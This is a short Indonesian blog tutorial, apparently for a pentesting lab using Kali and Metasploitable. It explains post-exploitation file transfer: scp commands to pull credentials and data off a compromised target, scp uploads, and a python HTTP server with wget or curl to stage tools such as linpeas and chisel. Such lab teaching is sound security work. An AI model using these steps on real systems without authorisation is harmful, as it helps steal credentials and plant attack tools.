Label

Cara upload dan download file dari dan ke target mesin



 


Ketika kamu sudah berhasil mendapatkan akses mesin, seperti SSH atau eksploit seperti RCE, maka ada saat kamu perlu mengupload sebuah file ke target, atau mengambil file di target.

Sebagai contoh berhasil dapat kredensial ssh target. Kamu bisa menggunakan scp untuk ambil file dari mesin target seperti mengambil data penting atau kredensial.

Contoh lain kamu ingin menaikkan hak akses ke root, sehingga kamu ingin upload bash script linpeas atau tunelling dengan mengupload binary yaitu chisel atau python code seperti rpivot.

Ada beberapa comand yang bisa digunakan. Mari kita ulas

Menggunakan SSH



1. scp untuk mengambil file / kredesial / data penting dari target. (download)



ada file bisa.txt di target, ini akan kita download ke mesin kali, ketikkan perintah:



scp user@ip/host:pathlokasitarget pathtujuan

contoh:


1. untuk menyimpan di folder tempat kamu menjalankan comand:

scp msfadmin@192.168.50.3:/home/user/bisa.txt .

tambahkan tanda (.) titik dibelakangnya

2. untuk menyimpan di folder yang kamu kehendaki.

scp msfadmin@192.168.59.3:/home/user/bisa.txt (spasi) /home/kali => akan tersimpan di folder kali

3. untuk menyimpan di folder yang kamu kehendaki dan mengganti namanya:

scp msfadmin@192.168.59.3:/home/user/bisa.txt (spasi) /home/kali/bisa2.txt

4. untuk menyimpan di folder tempat kamu menjalankan comand dan merubah namanya:

scp msfadmin@192.168.59.3:/home/user/bisa.txt (spasi) ./bisa2.txt



Tapi kadang kamu akan menerima pesan error seperti ini, kamu dapat jalankan. Ini karena ssh di kali kamu mematikan algoritma lama, sedangkan mesin metasploitable yang lawas masih pake algoritma lama,.

solusi ketikkan:

scp -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa \

    msfadmin@192.168.50.3:/home/user/bisa.txt .

nanti file akan berhasil kamu download.


2. scp untuk kirim file ke target. (upload)


scp lokal_file msfadmin@192.168.50.3:/path/remote/

contoh: 

scp /home/kali msfadmin@192.168.50.3:/home/user/

scp -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa \
  lokal_file msfadmin@192.168.50.3:/path/remote/



Tapi semua tergantung kepada akses file / folder,.

Untuk download butuh akses execute di folder dan read di file. Untuk upload butuh akses execute di folder dan write di file.


Menggunakan Python

Jalankan di mesin yang memiliki file (server):

python3 -m http.server 8000


Jalankan di mesin yang ingin copy file (client):

wget http://<IP_SERVER>:8000/namafile




atau 

curl -O http://<IP_SERVER>:8000/namafile





Label:

Komentar

Posting Komentar